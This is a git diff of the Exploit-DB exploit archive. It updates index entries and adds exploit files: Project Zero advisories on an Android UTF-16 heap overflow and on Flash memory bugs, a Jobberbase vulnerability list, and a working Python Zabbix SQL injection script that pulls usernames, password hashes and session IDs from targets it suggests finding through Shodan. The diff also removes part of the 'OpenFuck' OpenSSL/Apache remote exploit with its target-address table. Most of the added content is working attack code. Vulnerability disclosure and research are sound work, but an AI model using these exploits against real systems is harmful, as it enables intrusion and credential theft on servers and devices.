MP3 Converter 2.7.3.700 - '.m3u' Exploit (Universal ASLR + DEP Bypass)",2016-06-13,"Fitzl Csaba",windows,local,0 39934,platforms/php/webapps/39934.txt,"Dream Gallery 2.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80 39935,platforms/php/webapps/39935.txt,"Grid Gallery 1.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80 39936,platforms/php/webapps/39936.txt,"Joomla PayPlans (com_payplans) Extension 3.3.6 - SQL Injection",2016-06-13,"Persian Hack Team",php,webapps,80 @@ -36179,7 +36187,7 @@ id,file,description,date,author,platform,type,port 39964,platforms/php/webapps/39964.html,"SlimCMS 0.1 - Cross-Site Request Forgery (Change Admin Password)",2016-06-16,"Avinash Thapa",php,webapps,80 39969,platforms/php/webapps/39969.php,"WordPress Gravity Forms Plugin 1.8.19 - Arbitrary File Upload",2016-06-17,"Abk Khan",php,webapps,80 39970,platforms/php/webapps/39970.txt,"Vicidial 2.11 - Scripts Persistent Cross-Site Scripting",2016-06-17,"David Silveiro",php,webapps,80 -39971,platforms/php/webapps/39971.php,"phpATM 1.32 - Remote Command Execution (Arbitrary File Upload) on Windows Servers",2016-06-17,"Paolo Massenio",php,webapps,80 +39971,platforms/php/webapps/39971.php,"phpATM 1.32 - Arbitrary File Upload / Remote Command Execution (Windows Servers)",2016-06-17,"Paolo Massenio",php,webapps,80 39972,platforms/php/webapps/39972.txt,"phpATM 1.32 - Multiple Vulnerabilities",2016-06-17,"Paolo Massenio",php,webapps,80 39973,platforms/linux/remote/39973.rb,"op5 7.1.9 - Configuration Command Execution",2016-06-17,Metasploit,linux,remote,443 39974,platforms/php/webapps/39974.html,"WordPress Ultimate Product Catalog Plugin 3.8.1 - Privilege Escalation",2016-06-20,"i0akiN SEC-LABORATORY",php,webapps,80 @@ -36288,8 +36296,8 @@ id,file,description,date,author,platform,type,port 40112,platforms/cgi/webapps/40112.txt,"Clear Voyager Hotspot IMW-C910W - Arbitrary File Disclosure",2016-07-15,Damaster,cgi,webapps,80 40145,platforms/windows/local/40145.txt,"Rapid7 AppSpider 6.12 - Privilege Escalation",2016-07-25,LiquidWorm,windows,local,0 40113,platforms/linux/remote/40113.txt,"OpenSSHD 7.2p2 - User Enumeration",2016-07-18,"Eddie Harari",linux,remote,22 -40114,platforms/php/webapps/40114.py,"vBulletin 5.x/4.x - Post-Authentication Persistent Cross-Site Scripting in AdminCP/ApiLog via xmlrpc API",2014-10-12,tintinweb,php,webapps,0 -40115,platforms/php/webapps/40115.py,"vBulletin 4.x - Post-Authentication SQL Injection in breadcrumbs via xmlrpc API",2014-10-12,tintinweb,php,webapps,0 +40114,platforms/php/webapps/40114.py,"vBulletin 5.x/4.x - Authenticated Persistent Cross-Site Scripting in AdminCP/ApiLog via xmlrpc API",2014-10-12,tintinweb,php,webapps,0 +40115,platforms/php/webapps/40115.py,"vBulletin 4.x - Authenticated SQL Injection in breadcrumbs via xmlrpc API",2014-10-12,tintinweb,php,webapps,0 40118,platforms/windows/local/40118.txt,"Microsoft Internet Explorer 11 (Windows 10) - VBScript Memory Corruption Proof-of-Concept Exploit (MS16-051)",2016-06-22,"Brian Pak",windows,local,0 40119,platforms/linux/remote/40119.md,"DropBearSSHD 2015.71 - Command Injection",2016-03-03,tintinweb,linux,remote,0 40120,platforms/hardware/remote/40120.py,"Meinberg NTP Time Server ELX800/GPS M4x V5.30p - Remote Command Execution / Escalate Privileges",2016-07-17,b0yd,hardware,remote,0 @@ -36333,7 +36341,7 @@ id,file,description,date,author,platform,type,port 40159,platforms/hardware/webapps/40159.txt,"Compal CH7465LG-LC Modem/Router CH7465LG-NCIP-4.50.18.13-NOSH - Multiple Vulnerabilities",2016-07-25,"Gergely Eberhardt",hardware,webapps,80 40160,platforms/hardware/webapps/40160.py,"Bellini/Supercook Wi-Fi Yumi SC200 - Multiple Vulnerabilities",2016-07-25,"James McLean",hardware,webapps,0 40161,platforms/java/webapps/40161.txt,"Micro Focus Filr 2 2.0.0.421_ Filr 1.2 1.2.0.846 - Multiple Vulnerabilities",2016-07-25,"SEC Consult",java,webapps,9443 -40162,platforms/linux/remote/40162.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Post-Authentication Remote Root Exploit (Metasploit)",2016-07-26,xort,linux,remote,8000 +40162,platforms/linux/remote/40162.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Authenticated Remote Root Exploit (Metasploit)",2016-07-26,xort,linux,remote,8000 40163,platforms/php/webapps/40163.txt,"PHP File Vault 0.9 - Directory Traversal",2016-07-26,N_A,php,webapps,80 40164,platforms/multiple/local/40164.c,"VMware Virtual Machine Communication Interface (VMCI) vmci.sys - (PoC)",2013-03-06,"Artem Shishkin",multiple,local,0 40165,platforms/cgi/webapps/40165.txt,"Iris ID IrisAccess ICU 7000-2 - Multiple Vulnerabilities",2016-07-26,LiquidWorm,cgi,webapps,80 @@ -36345,13 +36353,13 @@ id,file,description,date,author,platform,type,port 40173,platforms/windows/local/40173.txt,"mySCADAPro 7 - Privilege Escalation",2016-07-29,"Karn Ganeshen",windows,local,0 40174,platforms/php/webapps/40174.txt,"WordPress Ultimate Product Catalog 3.9.8 Plugin - (do_shortcode via ajax) Blind SQL Injection",2016-07-29,"i0akiN SEC-LABORATORY",php,webapps,80 40175,platforms/win_x86/shellcode/40175.c,"Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes)",2016-07-29,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 -40176,platforms/linux/remote/40176.rb,"Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - Post-Authentication Remote Root Exploit (Metasploit) (3)",2016-07-29,xort,linux,remote,8000 -40177,platforms/linux/remote/40177.rb,"Barracuda Web Application Firewall 8.0.1.008 - Post-Authentication Remote Root Exploit (Metasploit)",2016-07-29,xort,linux,remote,8000 +40176,platforms/linux/remote/40176.rb,"Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - Authenticated Remote Root Exploit (Metasploit) (3)",2016-07-29,xort,linux,remote,8000 +40177,platforms/linux/remote/40177.rb,"Barracuda Web Application Firewall 8.0.1.008 - Authenticated Remote Root Exploit (Metasploit)",2016-07-29,xort,linux,remote,8000 40178,platforms/windows/remote/40178.py,"Easy File Sharing Web Server 7.2 - SEH Overflow (Egghunter)",2016-07-29,ch3rn0byl,windows,remote,80 40179,platforms/lin_x86/shellcode/40179.c,"Linux/x86 - NetCat Bind Shell with Port (44 / 52 bytes)",2016-07-29,Kyzer,lin_x86,shellcode,0 40180,platforms/linux/webapps/40180.txt,"Trend Micro Deep Discovery 3.7 / 3.8 SP1 (3.81) / 3.8 SP2 (3.82) - hotfix_upload.cgi Filename Remote Code Execution",2016-07-29,korpritzombie,linux,webapps,443 40184,platforms/multiple/dos/40184.html,"WebKit - TypedArray.copyWithin Memory Corruption",2016-07-29,"Google Security Research",multiple,dos,0 -40185,platforms/php/webapps/40185.py,"phpMyAdmin 4.6.2 - Post-Authentication Remote Code Execution",2016-07-29,@iamsecurity,php,webapps,80 +40185,platforms/php/webapps/40185.py,"phpMyAdmin 4.6.2 - Authenticated Remote Code Execution",2016-07-29,@iamsecurity,php,webapps,80 40189,platforms/php/webapps/40189.txt,"WordPress Booking Calendar Plugin 6.2 - SQL Injection",2016-08-01,"Edwin Molenaar",php,webapps,80 40190,platforms/php/webapps/40190.txt,"WordPress WP Live Chat Support Plugin 6.2.03 - Persistent Cross-Site Scripting",2016-08-01,"Dennis Kerdijk & Erwin Kievith",php,webapps,80 40191,platforms/php/webapps/40191.txt,"WordPress ALO EasyMail NewsLetter Plugin 2.9.2 - (Add/Import Arbitrary Subscribers) Cross-Site Request Forgery",2016-08-01,"Yorick Koster",php,webapps,80 @@ -36386,7 +36394,7 @@ id,file,description,date,author,platform,type,port 40222,platforms/lin_x86/shellcode/40222.c,"Linux/x86 - zsh TCP Bind Shell Port 9090 (96 bytes)",2016-08-10,thryb,lin_x86,shellcode,0 40223,platforms/lin_x86/shellcode/40223.c,"Linux/x86 - zsh Reverse TCP Shellcode port 9090 (80 bytes)",2016-08-10,thryb,lin_x86,shellcode,0 40224,platforms/windows/local/40224.txt,"Microsoft Word 2007/2010/2013/2016 - Out-of-Bounds Read Remote Code Execution (MS16-099)",2016-08-10,COSIG,windows,local,0 -40225,platforms/php/webapps/40225.py,"vBulletin 5.2.2 - Pre-Authentication Server Side Request Forgery (SSRF)",2016-08-10,"Dawid Golunski",php,webapps,80 +40225,platforms/php/webapps/40225.py,"vBulletin 5.2.2 - Unauthenticated Server Side Request Forgery (SSRF)",2016-08-10,"Dawid Golunski",php,webapps,80 40226,platforms/windows/local/40226.txt,"EyeLock Myris 3.3.2 - SDK Service Unquoted Service Path Privilege Escalation",2016-08-10,LiquidWorm,windows,local,0 40227,platforms/php/webapps/40227.txt,"EyeLock nano NXT 3.5 - Local File Disclosure",2016-08-10,LiquidWorm,php,webapps,80 40228,platforms/php/webapps/40228.py,"EyeLock nano NXT 3.5 - Remote Root Exploit",2016-08-10,LiquidWorm,php,webapps,80 @@ -36471,7 +36479,7 @@ id,file,description,date,author,platform,type,port 40324,platforms/jsp/webapps/40324.txt,"ZKTeco ZKBioSecurity 3.0 - Hardcoded Credentials Remote SYSTEM Code Execution",2016-08-31,LiquidWorm,jsp,webapps,8088 40325,platforms/jsp/webapps/40325.html,"ZKTeco ZKBioSecurity 3.0 - (Add Superadmin) Cross-Site Request Forgery",2016-08-31,LiquidWorm,jsp,webapps,8088 40326,platforms/jsp/webapps/40326.txt,"ZKTeco ZKBioSecurity 3.0 - Directory Traversal",2016-08-31,LiquidWorm,jsp,webapps,8088 -40327,platforms/jsp/webapps/40327.txt,"ZKTeco ZKBioSecurity 3.0 - (visLogin.jsp) Local Authorization Bypass",2016-08-31,LiquidWorm,jsp,webapps,0 +40327,platforms/jsp/webapps/40327.txt,"ZKTeco ZKBioSecurity 3.0 - (visLogin.jsp) Local Authentication Bypass",2016-08-31,LiquidWorm,jsp,webapps,0 40328,platforms/jsp/webapps/40328.html,"ZKTeco ZKAccess Security System 5.3.1 - Persistent Cross-Site Scripting",2016-08-31,LiquidWorm,jsp,webapps,8088 40329,platforms/php/dos/40329.php,"PHP 7.0 - JsonSerializable::jsonSerialize json_encode Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0 40330,platforms/windows/local/40330.py,"FortiClient SSLVPN 5.4 - Credentials Disclosure",2016-09-01,"Viktor Minin",windows,local,0 diff --git a/platforms/android/remote/40354.txt b/platforms/android/remote/40354.txt new file mode 100755 index 000000000..3d58d5b11 --- /dev/null +++ b/platforms/android/remote/40354.txt @@ -0,0 +1,160 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=840 + +There's an inconsistency between the way that the two functions in libutils/Unicode.cpp handle invalid surrogate pairs in UTF16, resulting in a mismatch between the size calculated by utf16_to_utf8_length and the number of bytes written by utf16_to_utf8. + +This results in a heap-buffer-overflow; one route to this code is the String8 constructor initialising a String8 from a String16. This can be reached via binder calls to the core system service "android.security.keystore" from a normal app context without any additional permissions. There are probably other routes to reach this code with attacker controlled data. + +ssize_t utf16_to_utf8_length(const char16_t *src, size_t src_len) +{ + if (src == NULL || src_len == 0) { + return -1; + } + + size_t ret = 0; + const char16_t* const end = src + src_len; + while (src < end) { + if ((*src & 0xFC00) == 0xD800 && (src + 1) < end + && (*++src & 0xFC00) == 0xDC00) { // <---- increment src here even if condition is false + // surrogate pairs are always 4 bytes. + ret += 4; + src++; + } else { + ret += utf32_codepoint_utf8_length((char32_t) *src++); // <---- increment src again + } + } + return ret; +} + +void utf16_to_utf8(const char16_t* src, size_t src_len, char* dst) +{ + if (src == NULL || src_len == 0 || dst == NULL) { + return; + } + + const char16_t* cur_utf16 = src; + const char16_t* const end_utf16 = src + src_len; + char *cur = dst; + while (cur_utf16 < end_utf16) { + char32_t utf32; + // surrogate pairs + if((*cur_utf16 & 0xFC00) == 0xD800 && (cur_utf16 + 1) < end_utf16 + && (*(cur_utf16 + 1) & 0xFC00) == 0xDC00) { // <---- no increment if condition is false + utf32 = (*cur_utf16++ - 0xD800) << 10; + utf32 |= *cur_utf16++ - 0xDC00; + utf32 += 0x10000; + } else { + utf32 = (char32_t) *cur_utf16++; // <---- increment src + } + const size_t len = utf32_codepoint_utf8_length(utf32); + utf32_codepoint_to_utf8((uint8_t*)cur, utf32, len); + cur += len; + } + *cur = '\0'; +} + +An example character sequence would be the following: + +\x41\xd8 \x41\xd8 \x41\xdc \x00\x00 + +This will be processed by utf16_to_utf8_len like this: + +first loop iteration: + +\x41\xd8 \x41\xd8 \x41\xdc \x00\x00 +^ +invalid surrogate; skip at (*++src & 0xfc00 == 0xdc00) + +\x41\xd8 \x41\xd8 \x41\xdc \x00\x00 + ^ + invalid surrogate; emit length 0 at (utf32_codepoint_utf8_length(*src++)) + +second loop iteration: + +\x41\xd8 \x41\xd8 \x41\xdc \x00\x00 + ^ + invalid surrogate; emit length 0 at (utf32_codepoint_utf8_length(*src++)) + +And will be processed by utf16_to_utf8 like this: + +first loop iteration: + +\x41\xd8 \x41\xd8 \x41\xdc \x00\x00 +^ +invalid surrogate; write 0 length character to output + +second loop iteration + +\x41\xd8 \x41\xd8 \x41\xdc \x00\x00 + ^ + valid surrogate pair 0xd841 0xdc41; emit length 4 character to output + +We can then construct a crash PoC using this sequence for the String16 passed to the keystore method 'getKeyCharacteristics' that will perform the String8(String16&) constructor on attacker supplied input; and provide a massive input string. The crash PoC should write 0x20000 * 2/3 bytes into a 2 byte heap allocation. It has been tested on a recent nexus5x userdebug build; resulting in the following crash (the object backing an android::vectorImpl has been corrupted by the overwrite, and "\xf0\xa0\x91\x81" is the utf8 encoding for the utf16 "\x41\xd8 \x41\xdc"): + +pid: 16669, tid: 16669, name: keystore >>> /system/bin/keystore <<< +signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x91a0f08191a110 + x0 8191a0f08191a108 x1 0000000000000000 x2 0000000000000000 x3 0000000000000020 + x4 00000000ffffffa0 x5 0000000000000010 x6 0000000000000001 x7 0000007f802c0018 + x8 0000000000000000 x9 000000000a7c5ac5 x10 0000000000000000 x11 0000000000000000 + x12 000000000000d841 x13 0000000000000841 x14 0000000000000041 x15 0000007f8067bd9e + x16 0000005565984f08 x17 0000007f80aeee48 x18 00000000ffffff91 x19 0000007fd1de26c0 + x20 8191a0f08191a108 x21 8191a0f08191a0f0 x22 0000000000000000 x23 0000005565984000 + x24 8191a0f08191a0f0 x25 0000007fd1dea7b8 x26 0000007f806690e0 x27 0000007fd1de25d0 + x28 000000556596f000 x29 0000007fd1de2550 x30 0000005565961188 + sp 0000007fd1de2550 pc 0000007f80aeee58 pstate 0000000060000000 + +backtrace: + #00 pc 0000000000016e58 /system/lib64/libutils.so (_ZN7android10VectorImpl13editArrayImplEv+16) + #01 pc 000000000000a184 /system/bin/keystore + #02 pc 00000000000112d0 /system/bin/keystore + #03 pc 000000000000b7f4 /system/lib64/libkeystore_binder.so (_ZN7android17BnKeystoreService10onTransactEjRKNS_6ParcelEPS1_j+1560) + #04 pc 0000000000024c9c /system/lib64/libbinder.so (_ZN7android7BBinder8transactEjRKNS_6ParcelEPS1_j+168) + #05 pc 000000000002dd98 /system/lib64/libbinder.so (_ZN7android14IPCThreadState14executeCommandEi+1240) + #06 pc 000000000002de4c /system/lib64/libbinder.so (_ZN7android14IPCThreadState20getAndExecuteCommandEv+140) + #07 pc 000000000002def4 /system/lib64/libbinder.so (_ZN7android14IPCThreadState14joinThreadPoolEb+76) + #08 pc 0000000000007a04 /system/bin/keystore (main+1940) + #09 pc 000000000001bc98 /system/lib64/libc.so (__libc_init+100) + #10 pc 0000000000007c20 /system/bin/keystore + +###################################################### + +Actually you can compromise many native system services using this bug (ie those not implemented in Java); because of the interface token checking code in Parcel.cpp. See attached for another PoC that takes as a first command line argument the name of the service to crash. On my nexus 5x with very unscientific testing, this includes the following services: + + - phone, iphonesubinfo, isub (com.android.phone) + - telecom, voiceinteraction, backup, audio, location, notification, connectivity, wifi, network_management, statusbar, device_policy, mount, input_method, window, content, account, telephony.registry, user, package, batterystats (system_server) + - media.audio_policy, media.audio_flinger (mediaserver) + - drm.drmManager (drmserver) + - android.security.keystore (keystore) + - SurfaceFlinger (surfaceflinger) + +bool Parcel::enforceInterface(const String16& interface, + IPCThreadState* threadState) const +{ + int32_t strictPolicy = readInt32(); + if (threadState == NULL) { + threadState = IPCThreadState::self(); + } + if ((threadState->getLastTransactionBinderFlags() & + IBinder::FLAG_ONEWAY) != 0) { + // For one-way calls, the callee is running entirely + // disconnected from the caller, so disable StrictMode entirely. + // Not only does disk/network usage not impact the caller, but + // there's no way to commuicate back any violations anyway. + threadState->setStrictModePolicy(0); + } else { + threadState->setStrictModePolicy(strictPolicy); + } + const String16 str(readString16()); + if (str == interface) { + return true; + } else { + ALOGW("**** enforceInterface() expected '%s' but read '%s'", + String8(interface).string(), String8(str).string()); + return false; + } +} + + + +Proofs of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40354.zip + diff --git a/platforms/multiple/dos/40355.txt b/platforms/multiple/dos/40355.txt new file mode 100755 index 000000000..738d281e8 --- /dev/null +++ b/platforms/multiple/dos/40355.txt @@ -0,0 +1,32 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=845 + +There is an info leak in the Transform.colorTranform getter. If the constructor for ColorTransform is overwritten with a getter using addProperty, this getter will execute when fetching the constructor, which can then free the MovieClip containing the Tranform. + +A minimal PoC is as follows: + +this.createEmptyMovieClip( "mc", 1); +var c = new ColorTransform( 77, 88, 99, 0.5, 1, 2, 3, 4); +var t:Transform = new Transform( mc ); +t.colorTransform = c; +this.createTextField( "tf", 2, 0, 0, 2000, 200); +var ct = ColorTransform; +var g = flash.geom; +g.addProperty("ColorTransform", func, func); +var q = t.colorTransform; +tf.text = q.greenMultiplier + "\n" + q.blueMultiplier + "\n" + q.color; + +function func(){ + + mc.removeMovieClip(); + + return ct; + + } + + +A sample swf and fla are attached. The PoC prints the value of unallocated memory to the screen. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40355.zip + diff --git a/platforms/multiple/dos/40356.txt b/platforms/multiple/dos/40356.txt new file mode 100755 index 000000000..cf0f1c12f --- /dev/null +++ b/platforms/multiple/dos/40356.txt @@ -0,0 +1,21 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=846 + +If a method is called on a MovieClip, and a getter is set with the name of the method, the getter will get executed during the call, and can free the MovieClip, leading to a user-after-free. A minimal PoC is as follows: + +var mc = this.createEmptyMovieClip( "mc", 1); +mc.addProperty( "f", func, func ); +mc.f("hello"); + +function func(){ + + mc.removeMovieClip(); + // Fix heap + var d:Date = new Date(); + return d.getDate; + + } + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40356.zip + diff --git a/platforms/php/webapps/40351.txt b/platforms/php/webapps/40351.txt new file mode 100755 index 000000000..b65dd3d30 --- /dev/null +++ b/platforms/php/webapps/40351.txt @@ -0,0 +1,40 @@ +Jobberbase: http://www.jobberbase.com/ +Version: 2.0 +By Ross Marks: http://www.rossmarks.co.uk + +1) Local path disclosure - change any variable to an array and in most cases it will tell you the local path where the application is installed + eg. http://example.com/api/api.php?action=getJobs&type[]=0&category=0&count=5&random=1&days_behind=7&response=js + returns: Array to string conversion in /var/www/jobberbase/_lib/class.Job.php + +2) Open redirect - when submitting an application can change "Referer:" header to anything and will redirect there + +3) reflect XSS in username - http://example.com/admin/ + eg. "> + reflect XSS in search: http://example.com/search/|/ + +4) persistant XSS on admin backend homepage + create a job and give the URL: + " onhover="alert(1) + persistant XSS - admin add to category name (no protection) + +5) unrestricted file upload + upload CV accepts any filetype appends _ uniqueid() to filename + eg. "file.php" becomes "file_.php" + uniquid in in insecure method for generating random sequences and is based on microtime + if the server is using an older version of PHP a null byte can be used + ie. "test.php%00.php" would be uploaded as "test.php" + +6) code execution race condition: + if the admin has chosen to not store uploaded CV's + they are first moved from /tmp to the writable /upload directory before being unlinked + this gives a brief window of opportunity for an attacker to run http://example.com/uploads/file.php before it is deleted + +7) SQL injection in http://example.com/api/api.php?action=getJobs&type=0&category=0&count=5&random=1&days_behind=7&response=js + days_behind parameter is vulnerable + +** notes ** + +admin change password page don't need old password, no csrf token just a simple POST request. +admin password stored in md5 format unsalted +cookies do NOT have "secure" or "HTTPonly" flags enabled +no csrf anywhere diff --git a/platforms/php/webapps/40353.py b/platforms/php/webapps/40353.py new file mode 100755 index 000000000..162ae3489 --- /dev/null +++ b/platforms/php/webapps/40353.py @@ -0,0 +1,56 @@ +# Exploit Title: 2.0 < Zabbix < 3.0.4 SQL Injection Python PoC +# Data: 20-08-2016 +# Software Link: www.zabbix.com +# Exploit Author: Unknown(http://seclists.org/fulldisclosure/2016/Aug/82) +# Version: Zabbix 2.0-3.0.x(<3.0.4) + +# PoC Author: Zzzians +# Contact: Zzzians@gmail.com +# Test on: Linux (Debian/CentOS/Ubuntu) + +# -*- coding: utf_8 -*- +# Use Shodan or and enjoy :) +# Comb the intranet for zabbix and enjoy :) +import sys,os,re,urllib2 +def Inject(url,sql,reg): + payload = url + "jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=" + urllib2.quote( + sql) + "&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1" + try: + response = urllib2.urlopen(payload, timeout=20).read() + except Exception, msg: + print '\t\tOpps,an error occurs...',msg + else: + result_reg = re.compile(reg) + results = result_reg.findall(response) + print payload #Uncomment this to see details + if results: + return results[0] +def exploit(url,userid): + passwd_sql = "(select 1 from (select count(*),concat((select(select concat(cast(concat(alias,0x7e,passwd,0x7e) as char),0x7e)) from zabbix.users LIMIT "+str(userid-1)+",1),floor(rand(0)*2))x from information_schema.tables group by x)a)" + session_sql="(select 1 from (select count(*),concat((select(select concat(cast(concat(sessionid,0x7e,userid,0x7e,status) as char),0x7e)) from zabbix.sessions where status=0 and userid="+str(userid)+" LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)" + password = Inject(url,passwd_sql,r"Duplicate\s*entry\s*'(.+?)~~") + if(password): + print '[+]Username~Password : %s' % password + else: + print '[-]Get Password Failed' + session_id = Inject(url,session_sql,r"Duplicate\s*entry\s*'(.+?)~") + if(session_id): + print "[+]Session_id:%s" % session_id + else: + print "[-]Get Session id Failed" + print '\n' + +def main(): + print '=' * 70 + print '\t 2.0.x? < Zabbix < 3.0.4 SQL Inject Python Exploit Poc' + print '\t\t Author:Zzzians(Zzzians@gmail.com)' + print '\t Reference:http://seclists.org/fulldisclosure/2016/Aug/82' + print '\t\t\t Time:2016-08-20\n' + urls = ["http://10.15.5.86"] + ids = [1,2] + for url in urls: + if url[-1] != '/': url += '/' + print '='*25 + url + '='*25 + for userid in ids: + exploit(url,userid) +main() diff --git a/platforms/unix/remote/21671.c b/platforms/unix/remote/21671.c index 345ead72f..1513b6692 100755 --- a/platforms/unix/remote/21671.c +++ b/platforms/unix/remote/21671.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/5363/info A buffer-overflow vulnerability has been reported in some versions of OpenSSL. @@ -5,6 +6,7 @@ A buffer-overflow vulnerability has been reported in some versions of OpenSSL. The issue occurs in the handling of the client key value during the negotiation of the SSLv2 protocol. A malicious client may be able to exploit this vulnerability to execute arbitrary code as the vulnerable server process or possibly to create a denial-of-service condition. ***UPDATE: A worm that likely exploits this vulnerability has been discovered propagating in the wild. Additionally, this code includes peer-to-peer and distributed denial-of-service capabilities. There have been numerous reports of intrusions in Europe. It is not yet confirmed whether this vulnerability is in OpenSSL, mod_ssl, or another component. Administrators are advised to upgrade to the most recent versions or to disable Apache, if possible, until more information is available. +*/ /* * VERY PRIV8 spabam SPAX@zone-h.org diff --git a/platforms/unix/remote/21672.c b/platforms/unix/remote/21672.c deleted file mode 100755 index 1612d8af0..000000000 --- a/platforms/unix/remote/21672.c +++ /dev/null @@ -1,1303 +0,0 @@ -source: http://www.securityfocus.com/bid/5363/info - -A buffer-overflow vulnerability has been reported in some versions of OpenSSL. - -The issue occurs in the handling of the client key value during the negotiation of the SSLv2 protocol. A malicious client may be able to exploit this vulnerability to execute arbitrary code as the vulnerable server process or possibly to create a denial-of-service condition. - -***UPDATE: A worm that likely exploits this vulnerability has been discovered propagating in the wild. Additionally, this code includes peer-to-peer and distributed denial-of-service capabilities. There have been numerous reports of intrusions in Europe. It is not yet confirmed whether this vulnerability is in OpenSSL, mod_ssl, or another component. Administrators are advised to upgrade to the most recent versions or to disable Apache, if possible, until more information is available. - -/* - * OF version r00t VERY PRIV8 spabam - * Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto - * objdump -R /usr/sbin/httpd|grep free to get more targets - * #hackarena irc.brasnet.org - */ - -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#include -#include -#include -#include - -/* update this if you add architectures */ -#define MAX_ARCH 138 - -struct archs { - char* desc; - int func_addr; /* objdump -R /usr/sbin/httpd | grep free */ -} architectures[] = { - - { - "Caldera OpenLinux (apache-1.3.26)", - 0x080920e0 - }, - { - "Cobalt Sun 6.0 (apache-1.3.12)", - 0x8120f0c - }, - { - "Cobalt Sun 6.0 (apache-1.3.20)", - 0x811dcb8 - }, - { - "Cobalt Sun x (apache-1.3.26)", - 0x8123ac3 - }, - { - "Cobalt Sun x Fixed2 (apache-1.3.26)", - 0x81233c3 - }, - { - "Conectiva 4 (apache-1.3.6)", - 0x08075398 - }, - { - "Conectiva 4.1 (apache-1.3.9)", - 0x0808f2fe - }, - { - "Conectiva 6 (apache-1.3.14)", - 0x0809222c - }, - { - "Conectiva 7 (apache-1.3.12)", - 0x0808f874 - }, - { - "Conectiva 7 (apache-1.3.19)", - 0x08088aa0 - }, - { - "Conectiva 7/8 (apache-1.3.26)", - 0x0808e628 - }, - { - "Conectiva 8 (apache-1.3.22)", - 0x0808b2d0 - }, - { - "Debian GNU Linux 2.2 Potato (apache_1.3.9-14.1)", - 0x08095264 - }, - { - "Debian GNU Linux (apache_1.3.19-1)", - 0x080966fc - }, - { - "Debian GNU Linux (apache_1.3.22-2)", - 0x08096aac - }, - { - "Debian GNU Linux (apache-1.3.22-2.1)", - 0x08083828 - }, - { - "Debian GNU Linux (apache-1.3.22-5)", - 0x08083728 - }, - { - "Debian GNU Linux (apache_1.3.23-1)", - 0x08085de8 - }, - { - "Debian GNU Linux (apache_1.3.24-2.1)", - 0x08087d08 - }, - { "Debian Linux GNU Linux 2 (apache_1.3.24-2.1)", - 0x080873ac - }, - { - "Debian GNU Linux (apache_1.3.24-3)", - 0x08087d68 - }, - { - "Debian GNU Linux (apache-1.3.26-1)", - 0x0080863c4 - }, - { - "Debian GNU Linux 3.0 Woody (apache-1.3.26-1)", - 0x080863cc - }, - { "Debian GNU Linux (apache-1.3.27)", - 0x0080866a3 - }, - - -{ "FreeBSD (apache-1.3.9)", 0xbfbfde00 }, -{ "FreeBSD (apache-1.3.11)", 0x080a2ea8 }, -{ "FreeBSD (apache-1.3.12.1.40)", 0x080a7f58 }, -{ "FreeBSD (apache-1.3.12.1.40)", 0x080a0ec0 }, -{ "FreeBSD (apache-1.3.12.1.40)", 0x080a7e7c }, -{ "FreeBSD (apache-1.3.12.1.40_1)", 0x080a7f18 }, -{ "FreeBSD (apache-1.3.12)", 0x0809bd7c }, -{ "FreeBSD (apache-1.3.14)", 0xbfbfdc00 }, -{ "FreeBSD (apache-1.3.14)", 0x080ab68c }, -{ "FreeBSD (apache-1.3.14)", 0x0808c76c }, -{ "FreeBSD (apache-1.3.14)", 0x080a3fc8 }, -{ "FreeBSD (apache-1.3.14)", 0x080ab6d8 }, -{ "FreeBSD (apache-1.3.17_1)", 0x0808820c }, -{ "FreeBSD (apache-1.3.19)", 0xbfbfdc00 }, -{ "FreeBSD (apache-1.3.19_1)", 0x0808c96c }, -{ "FreeBSD (apache-1.3.20)", 0x0808cb70 }, -{ "FreeBSD (apache-1.3.20)", 0xbfbfc000 }, -{ "FreeBSD (apache-1.3.20+2.8.4)", 0x0808faf8 }, -{ "FreeBSD (apache-1.3.20_1)", 0x0808dfb4 }, -{ "FreeBSD (apache-1.3.22)", 0xbfbfc000 }, -{ "FreeBSD (apache-1.3.22_7)", 0x0808d110 }, -{ "FreeBSD (apache_fp-1.3.23)", 0x0807c5f8 }, -{ "FreeBSD (apache-1.3.24_7)", 0x0808f8b0 }, -{ "FreeBSD (apache-1.3.24+2.8.8)", 0x080927f8 }, -{ "FreeBSD 4.6.2-Release-p6 (apache-1.3.26)", 0x080c432c }, -{ "FreeBSD 4.6-Realease (apache-1.3.26)", 0x0808fdec }, -{ "FreeBSD (apache-1.3.27)", 0x080902e4 }, - - - { - "Gentoo Linux (apache-1.3.24-r2)", - 0x08086c34 - }, - { - "Linux Generic (apache-1.3.14)", - 0xbffff500 - }, - { - "Mandrake Linux X.x (apache-1.3.22-10.1mdk)", - 0x080808ab - }, - { - "Mandrake Linux 7.1 (apache-1.3.14-2)", - 0x0809f6c4 - }, - { - "Mandrake Linux 7.1 (apache-1.3.22-1.4mdk)", - 0x0809d233 - }, - { - "Mandrake Linux 7.2 (apache-1.3.14-2mdk)", - 0x0809f6ef - }, - { - "Mandrake Linux 7.2 (apache-1.3.14) 2", - 0x0809d6c4 - }, - { - "Mandrake Linux 7.2 